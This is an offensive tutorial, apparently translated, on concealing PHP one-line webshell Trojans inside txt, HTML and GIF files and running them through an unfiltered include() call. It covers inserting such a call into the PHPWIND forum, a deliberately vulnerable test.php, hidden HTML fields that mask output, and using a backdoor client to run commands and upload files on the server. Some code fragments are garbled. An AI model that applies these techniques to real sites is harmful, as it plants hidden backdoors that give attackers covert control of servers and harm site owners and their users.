Recently, many friends have been asking me if I can hide my one-sentence Trojan in HTML or pictures. In fact, inserting one-sentence Trojan into a PHP file is already very hidden. If I insist on putting it in an HTML file or In the picture, let’s continue reading the test report below.
You must know that if you just put the PHP statement into the image, it will not be executed anyway, because PHP only parses files with the extension php. So it is necessary to be able to execute the PHP statements hidden in the picture. We just use the calling functions in PHP: include, require, etc.
We still remember the article about hiding Trojans in pictures a few days ago. That is, use statements such as include("x.gif") in the PHP file to call the Trojan horse statements hidden in the image. The statements in ASP are similar. It seems very hidden, but if you directly call the image, it will not be difficult for someone who knows a little bit about PHP to find something suspicious. Since it is difficult to pass parameters using the GET method in the URL, the performance of the Trojan insertion cannot be fully utilized.
The Include function is used frequently in PHP, so it causes too many security issues. For example, the vulnerability of PHPWIND1.36 is caused by the lack of filtering of the variables behind the include. From this we can construct similar statements to insert into PHP files. Then hide the Trojan in a picture or HTML file, which can be said to be more concealed. For example, insert the following statement in the PHPWIND forum:
<‘’? @include include/.$PHPWIND_ROOT;? >
General administrators cannot see this.
With the help of include function, we can hide PHP Trojans in many types of files such as txt, html and image files. Because these three types of files, txt, html and image files, are the most common in forums and article systems, we will do the tests in order below.
First create a PHP file test.php. The content of the file is:
$test=$_GET[test];
@include test/.$test
? >
Txt files are generally description files, so we can put the one-sentence Trojan in the description file of the directory. Just create a TXT file t.txt. We paste the one-sentence Trojan into the t.txt file. Then visit hxxp://localhost/test/test.php?test=../t.txt. If you see the content of t.txt, it is OK. Then add the lanker micro PHP backdoor client Trojan address to hxxp ://localhost/test/test.php?test=../t.txt Just add cmd to the password, and you can see the results returned by execution.
For HTML files, they are generally template files. In order to enable the Trojan horse inserted into the HTML file to be called and executed without being displayed, we can add a text box with hidden attributes in the HTML, such as: Then use the same method as above. The return results of execution can generally be seen by viewing the source file. For example, use the function of viewing the directory of this program. View the source file content as I can get the directory as C:Uniserver2_7swww est.
Now let’s talk about picture files. The most poisonous trick is to hide Trojans in pictures. We can directly edit a picture and insert it at the end of the picture
After testing, it generally does not affect the picture. Then add the client Trojan address in the same way
We check the PHP environment variables and the result returned is the original image.
There may be some differences between the results here and what we imagined. In fact, the command has been run, but the returned results cannot be seen. Because this is a real GIF file, the returned results will not be displayed. In order to prove whether If the command is actually executed, we execute the upload file command. As expected, the file has been successfully uploaded to the server. The advantage of such forgery is that it is well concealed. Needless to say, the disadvantage is that there is no response. If you want to see the results returned, take out Notepad and create a fake image file.